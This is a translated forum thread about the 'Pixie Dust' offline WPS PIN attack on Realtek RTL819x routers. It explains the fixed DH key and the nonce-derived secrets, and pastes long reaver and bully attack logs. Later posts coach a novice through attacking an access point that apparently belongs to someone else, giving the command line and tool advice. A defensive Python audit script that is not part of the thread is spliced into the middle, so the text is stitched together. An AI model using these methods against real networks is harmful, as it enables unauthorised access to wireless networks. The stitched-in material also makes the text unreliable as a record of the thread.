Great news!
Now I'll tell you the story of this amazing discovery in full detail.
I hinted at it clearly yesterday morning in this reply:
Betis wrote: when a nonce repeats even though it is different, my theory is that somewhere a new key or passphrase is generated to produce some part of ES-0, of ES2, or of E-Hash or any of the PKE, PKR in the M2 step before reaching M3, but anyway I can't tell you anything until I see it for myself and test it live; it would be interesting to analyse a cap with the variable of this bug
In this case (Realtek rtl9xxx SDK), what happens is that the access point always generates the same PKE, whatever the router.
So we have zero entropy on the access point side in the DH key exchange.
We can therefore carry out a Pixie Dust type attack against Realtek if we know the value (or how it is generated) used for ES1 and ES2.
We know it is not 0 as in the Ralink case, nor the same interval as with the affected Broadcoms.
I will tell you soon what it is.
"Pixie Dust" offline brute-force attack to generate the valid PIN - reply 52
I had to keep the "secret" until our friend soxrok2212 officially announced it in the Kali "Pixie Dust" thread.
He has now spoken (cf. WPS Pixie Dust Attack (Offline WPS Attack) - reply 180), so I can too.
After the release of pixiewps, which was the result of weeks of effort, we decided not to stop halfway and to keep investigating the case of the Realtek chipsets together with the hardware we have.
Personally I have an Alfa AIPWH525 and a Totolink 300NR, and soxrok has a Belkin F9K1110.
Three fairly modern routers with Realtek-branded chipsets.
Each router has a different chipset, but what they have in common is that they share the "same base": the SDK development kit "RTL819X", known as the "rtl819x project".
The first thing that caught our attention (and encouraged us to go on) is that on these routers the WPS is done... pardon the expression... like crap.
Everything is designed backwards. For example, you have to disable WPS:
WPS ENABLED BY DEFAULT
PERMANENT FIXED PIN
When we look at the WPS section of the configuration interfaces we realise that they are the same: only the graphical look changes.
And we can note that both default PINs start with 0.
Coincidence? Or not?...
.... If we were in a purely random system we would have one chance in 20 of finding 0 twice as the first digit....
Suspicious?
A little/quite.
But it is nothing compared with what we discovered next...
PS: ... the only thing that saved these APs is that they have an AP rate limit that kicks in after three attempts, one of the nasty ones.
But if we can do a pixie dust attack, it is of no use (a single failed attempt).
Below I leave you some samples of an attack with reaver_mod against my access points...
These are the samples that literally blew our minds. But without resorting to artificial paradises, clear-headed and fresh as roses....
[P] E-Nonce: 1d:f2:a6:ab:10:f3:61:00:1d:2d:56:9c:68:d0:58:53
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2006-07-27
[+] Received M1 message
[P] AuthKey: 6c:7e:a0:4f:2b:e4:cc:a1:3c:98:8e:c3:96:0a:9f:0e:95:ab:9c:a0:0f:c5:6d:ab:19:5b:1a:e2:48:67:9e:40
[+] Sending M2 message
[P] E-Hash1: d7:26:cf:5e:09:8c:52:dd:4d:13:6b:0c:69:f8:23:59:ab:b3:09:03:bf:38:37:b6:36:ed:b1:12:30:9f:64:71
[P] E-Hash2: 3d:31:26:b1:34:28:c6:7c:ad:30:5c:b9:4f:38:b6:15:a6:2b:c1:e9:ad:59:28:6c:fe:cc:a3:de:38:68:c6:b0
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 5e:d4:51:9e:42:ba:11:b7:6c:09:b2:90:07:5c:ee:4a
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2006-07-27
[+] Received M1 message
[P] AuthKey: d9:83:51:60:84:b7:0d:e2:11:86:c3:cf:9c:bb:5c:81:9c:9f:06:91:81:6e:cb:59:fc:92:96:5e:61:25:9a:ea
[+] Sending M2 message
[P] E-Hash1: 8a:00:55:d9:8a:73:cc:98:61:17:0a:2f:40:57:43:40:0b:59:c8:3c:26:dd:08:3d:7f:0b:19:2e:ee:22:fc:de
[P] E-Hash2: f7:93:87:f9:da:14:fc:18:ef:6a:cf:c0:50:0a:70:47:e5:1c:65:9d:a9:c2:03:d0:62:af:02:25:08:ff:28:91
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 60:19:2e:67:35:16:6b:e7:7b:60:be:20:66:5d:65:54
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2006-07-27
Always the same PKE
INCONCEIVABLE
And even stronger...: the very same PKE comes out every time on my other access point:
[P] E-Nonce: 44:b2:7a:8a:4b:93:b5:20:57:ba:f9:47:5e:12:e8:d2
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2010-09-20
[+] Received M1 message
[P] AuthKey: 65:6f:56:03:5e:3a:ac:4e:eb:86:23:c4:3b:ab:e4:e0:a2:27:36:cb:69:04:9f:4a:8c:2a:79:a3:52:14:ed:e4
[+] Sending M2 message
[P] E-Hash1: 25:08:23:59:07:bb:fd:bb:ce:13:03:85:9b:b4:9b:25:ff:4d:9b:6a:ac:37:f0:d9:b2:22:b2:28:6a:95:74:dd
[P] E-Hash2: 2f:9e:f7:2d:1f:a9:99:8a:3e:10:4b:42:45:9d:43:fb:56:2f:bb:44:8b:5b:74:08:2d:1b:b0:45:b1:3a:f0:26
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 1
[+] Pin count advanced: 1. Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 0e:47:95:66:69:fd:b4:85:0b:b3:0f:94:18:f2:c1:06
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2010-09-20
[+] Received M1 message
[P] AuthKey: ed:d6:a1:b0:a5:02:87:8a:af:c1:8f:f1:81:40:e9:64:04:f7:36:9d:8f:17:c4:f7:78:00:5d:2a:7b:de:90:da
[+] Sending M2 message
[P] E-Hash1: 9c:c8:05:1e:cd:f4:a6:cd:d7:cf:09:e0:68:a3:42:1b:da:45:cd:04:ec:1c:bc:95:79:92:10:3f:c1:52:0c:b4
[P] E-Hash2: 2b:61:69:da:34:64:15:58:e3:0b:0a:71:44:fd:7f:51:a7:00:fb:2a:24:fb:49:56:18:cb:8f:08:3b:f5:df:60
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 29:ef:40:48:13:90:ac:c4:58:ec:ad:b8:2a:c7:fc:ce
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2010-09-20
We have, pardon the expression, a shitty implementation.
I remind you that in theory the PKE should not repeat.
If the PKE repeats sometimes, it means we have a system with very weak entropy at the level of the Diffie-Hellman key exchange.
If the PKE always repeats, it is simply that.... there is no entropy at all. And here we have zero entropy: the same values are always used to generate the PKE.
We know that
The PKE (enrollee = the router) is formed like this: g^A mod p
The PKR (registrar) is formed like this: g^B mod p
We are able to determine "g", "A" and "mod p", which are always the same, and therefore we will be able to guess the value of B.
This is as far as we got with my colleague soxrok... and we said to ourselves: "if we have a zero-entropy system for the key exchange, it is certain that we also have zero entropy later in the protocol when ES1 and ES2 are generated".
We are facing the same situation as with the Ralink chipsets: only the value used to generate ES1 and ES2 is not 0.
It is something else.
So we decided to write to Dominique Bongard so that he could help us, or at least tell us whether we were on the right track.
The first thing is to say loud and clear how kind and cool Dominique Bongard is.
He replied right away, saying he would take a look and asking us for more data and a firmware...
And two days later he wrote to us to give us the solution.
Without asking for anything, or whatever, he just gave it to us, explaining the reason in detail.
Guess what the Realtek engineers came up with....
ES-1 = ES-2 = E-Nonce
That is, using the very string that is visible and in the clear......
It is not 0 as for Ralink.
That is true; but we are at the same level of incompetence.
This holds if we send the PINs within one second (the default pace in reaver) and use long DH keys (which means that in this case we cannot use the -S option in reaver). Dominique explains to us that this is because the time is used as the seed (random_r.c).
What would happen if we send the PINs in more than one second (distance, interference, etc.)?
In this case we can use a second method to derive our PIN:
Simple; we do as for the Broadcoms: a brute force of the PRNG state.
And instead of using the interval that Broadcom uses, we will use the time over, say, a dozen seconds,
or thirty, or even two minutes... It doesn't matter!:
The match is found in a microsecond.
Even if, to be safe, we use the 3600 possible seconds that make up an hour.
EDIT
In the end we have been able to verify that some chipsets use the moment of the WPS exchange and others use the installation date of the firmware in use.
So in some cases the PIN is obtained instantly, and in others the seed must be brute-forced back to the installation date of the firmware.
To do this brute force, our friend wiire at first implemented the "-f" option in pixiewps.
He later removed it because pixiewps does it automatically when it does not find the PIN instantly.
The valid PIN is obtained this way in a few minutes.
In the end we can say that Realtek has done things a little better than Ralink and a little worse than Broadcom.
If we send the PIN within one second, we just adapt the Ralink case (and code), replacing the zero of our ES1 and ES2 with the router's nonce.
If we do not manage to send the PIN within one second (or less), we change tactics and use the Broadcom method to brute-force the state of the pseudo-random number generator. But this time we will use time values as the seed.
Wiire is integrating the changes into pixiewps (which has been officially included in the Kali Linux repositories), and work continues on reaver to make the attack more precise.
This is a tremendous advance, since it affects modern chipsets and hardware produced over the last four years (at least) and still in production.
Many thanks to Dominique for having listened to us, looked after us, and so kindly given us the solution and the details needed to build a method to exploit the flaw.
edit: here is Dominique's tweet about it:
Offline
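The comparison made by eye in the post above, turned into an audit check for logs taken from your own access points. This is an added example, not code from the thread or from reaver/pixiewps: the function names, the choice of "WPS Model Number" as the device label and the sample log (shortened, constructed hex values in the same "[P]" line format) are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in the "[P] name: value" format of the logs above.
# Hex values are shortened placeholders, not real keys or nonces.
SAMPLE_LOG = """\
[P] E-Nonce: 1d:f2:a6:ab
[P] PKE: aa:bb:cc:dd
[P] WPS Model Number: EX-0001
[+] Received M1 message
[P] E-Nonce: 5e:d4:51:9e
[P] PKE: aa:bb:cc:dd
[P] WPS Model Number: EX-0001
[P] E-Nonce: 60:19:2e:67
[P] PKE: aa:bb:cc:dd
[P] WPS Model Number: EX-0001
[P] E-Nonce: 44:b2:7a:8a
[P] PKE: aa:bb:cc:dd
[P] WPS Model Number: EX-0002
[P] E-Nonce: 0e:47:95:66
[P] PKE: aa:bb:cc:dd
[P] WPS Model Number: EX-0002
[P] E-Nonce: 29:ef:40:48
[P] PKE: 01:02:03:04
[P] WPS Model Number: EX-0003
[P] E-Nonce: 47:7e:ca:09
[P] PKE: 05:06:07:08
[P] WPS Model Number: EX-0003
"""

FIELD = re.compile(r"^\[P\]\s+([^:]+):\s*(.+?)\s*$")
HEX_FIELDS = {"E-Nonce", "PKE"}


def parse_sessions(log_text):
    """Split a log into WPS sessions; each E-Nonce line opens a new session."""
    sessions, current = [], None
    for line in log_text.splitlines():
        m = FIELD.match(line.strip())
        if not m:
            continue  # "[+]" / "[!]" progress lines carry no key material
        name, value = m.group(1).strip(), m.group(2)
        if name in HEX_FIELDS:
            value = value.replace(":", "").lower()  # normalise for comparison
        if name == "E-Nonce":
            current = {}
            sessions.append(current)
        if current is not None:
            current[name] = value
    # A session is only useful for this check if the M1 public key was logged.
    return [s for s in sessions if "PKE" in s]


def audit(sessions, device_key="WPS Model Number"):
    """Return (device, finding, detail) tuples.

    static-pke : the enrollee's DH public key repeats across sessions
    nonce-reuse: the same E-Nonce was seen twice on one device
    shared-pke : one PKE appears on devices with different labels
    """
    by_device = defaultdict(list)
    for s in sessions:
        by_device[s.get(device_key, "unknown")].append(s)

    findings = []
    pke_owners = defaultdict(set)
    for device, group in sorted(by_device.items()):
        pkes = {s["PKE"] for s in group}
        nonces = [s["E-Nonce"] for s in group]
        for pke in pkes:
            pke_owners[pke].add(device)
        if len(group) >= 2 and len(pkes) < len(group):
            findings.append((device, "static-pke",
                             f"{len(pkes)} distinct PKE in {len(group)} sessions"))
        if len(set(nonces)) < len(nonces):
            findings.append((device, "nonce-reuse",
                             f"{len(set(nonces))} distinct E-Nonce in {len(nonces)} sessions"))
    for pke, owners in pke_owners.items():
        if len(owners) > 1:
            findings.append((",".join(sorted(owners)), "shared-pke",
                             f"PKE {pke[:8]}... seen on {len(owners)} device labels"))
    return findings


if __name__ == "__main__":
    for device, kind, detail in audit(parse_sessions(SAMPLE_LOG)):
        print(f"{kind:12} {device:18} {detail}")
```

A device that shows up under static-pke or shared-pke should have WPS PIN disabled, or its firmware updated, before it stays in service.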
Well explained, thanks, this was what I was looking for: MAC 00:13:33, Realtek RTL 8671, WPS model EV-2006-07-27. Now I just have to test it and see if we get lucky. Regards
Offline
Hi
RTL 8671
This sounds to me like one of those "onboard" chipsets and I am not sure it is vulnerable... but on the other hand you have the same label in "WPS version" as a vulnerable one:
EV-2006-07-27
The brute force option goes much faster with the latest version of pixiewps and will take you 4-5 minutes at most (instead of 20-30).
If you have the same PKE as the one you see in this thread, it should be doable...
Tell us how it went...
Good luck
Offline
Hi, let's see what you think. It took me a while, but I am learning; I am a novice at this. I use Kali 2016.1 booted from USB with an Alfa awuso36nh adapter and a Yagi directional antenna.
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
[P] E-Nonce: 47:7e:ca:09:55:02:39:8a:05:0f:be:a0:4c:ab:fc:f8
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: b1:71:59:a8:11:56:37:b3:1a:64:84:0d:39:24:fc:dc
[P] PKR: 3c:5f:43:6e:d3:3a:57:d6:3c:20:f1:f3:9b:c2:c4:0d:65:29:32:b5:dc:5a:05:de:21:48:7f:74:c9:f3:41:7e:f8:3e:4a:55:ce:63:81:bf:01:50:07:ea:7a:00:22:c0:97:95:87:87:99:88:54:9e:67:ee:e2:eb:ab:96:42:ee:a2:ae:b2:d3:a2:a9:95:76:30:0e:89:19:54:ae:d4:be:63:5c:ac:c8:2a:59:5b:e1:46:b0:7d:34:20:09:44:cc:7f:f2:4e:81:21:b9:a5:53:d5:26:29:b5:86:4a:a2:cc:d0:18:ce:76:3e:0d:c9:bd:68:80:74:92:c9:0e:ee:4d:ba:da:22:31:4a:01:ca:7f:6e:84:2e:27:34:6c:db:e3:2f:12:c9:9c:81:9d:60:48:ca:ea:42:01:b1:ff:4f:ed:24:85:f3:87:3e:9d:e9:e2:1f:40:b6:9f:bb:76:4f:60:b7:14:f2:04:67:38:68:89:19:27:d0:02:40:bd:f7:66
[P] AuthKey: 09:84:cc:3e:23:40:6c:7f:fa:08:57:f8:2f:5d:a4:7a:6c:a1:12:2a:66:d9:d2:f4:b7:89:36:41:c2:4b:b4:6e
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
Comparing them, they are not the same, they do not repeat
[P] E-Nonce: 0b:04:55:50:49:7c:fc:d6:2c:bb:6b:4b:44:81:1f:de
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: b1:f7:fc:e4:08:da:ec:15:46:0b:1c:b7:b2:bc:6c:78
[P] PKR: 2d:63:6d:74:cd:dc:8d:2a:f2:7a:c7:cf:eb:40:d6:2e:9c:9e:0e:2f:99:c2:42:de:e5:36:26:60:a6:88:c9:5b:d7:4e:9d:b2:8b:a2:c8:65:2c:ca:3f:c2:e8:3a:f1:4f:f0:d3:3f:a8:cf:2f:67:b8:5c:6d:2f:4b:96:03:82:c6:71:51:1b:ed:12:fa:f6:ea:94:78:38:82:ea:7c:44:0a:ef:1d:56:12:a8:bd:9b:9c:a2:8f:16:8e:be:be:d9:86:61:5d:3c:9c:ad:ea:9d:21:76:28:a5:58:94:94:0f:fb:71:10:40:b1:31:67:74:2d:17:9c:e4:bc:75:42:7d:2c:25:15:13:b1:48:51:0c:e3:ce:c6:16:ec:f7:9e:ac:90:1c:5b:11:9b:57:95:45:69:21:d4:3c:9d:83:f6:2e:9b:e2:c9:f5:6c:8f:10:dd:aa:8c:27:aa:70:28:e2:06:0d:81:7a:06:a6:e8:72:37:f5:79:1b:58:1d:a4:9e:0e:b1
[P] AuthKey: 8d:74:30:cf:46:b2:1f:10:6e:70:c2:7b:98:ea:47:3d:72:16:6f:df:73:8e:68:92:2e:91:43:9e:31:ba:09:19
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
Offline
Hi
I have edited your message using the insert-code option for the console output (that is how it is done on forums).
The problem here is that you are not receiving the M3, and without the M3 you cannot do a pixiedust attack.
There are two possible reasons:
reception/transmission conditions (you are too far from the AP, there is too much interference)
The WPS PIN is not fully enabled (it may be in Push Button mode only, it may not have the PIN configured)
alfa awuso36nh
Bad choice, the chipset does not work well with reaver; that may be the reason, it is a third possible reason to explain the failure.
Have you tried bully?
It works better than reaver with this chipset (RT3070)
Comparing them, they are not the same, they do not repeat
They are the same, look closely: it is the PKE, not the PKR
You have the same PKE as all the vulnerable Realtek chipsets
d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
(the one shown in red in the first post of this thread)
Offline
OK, here is the information with bully, without good results in my opinion; let's see what you think
root@kali:~# sudo bully wlan1mon -b 00:13:33:XXXXXXX -c 1 -v 3
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'wlan1mon' to channel '1'
[!] Using '00:0d:b0:XXXXXXX' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '00:13:33:c5:84:a5' on channel '1'
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Disabling FCS validation (assuming --nofcs)
[+] Got beacon for 'Rocabado' (00:13:33:c5:84:a5)
[+] Loading randomized pins from '/root/.bully/pins'
[!] Restoring session from '/root/.bully/001333XXXXXX.run'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
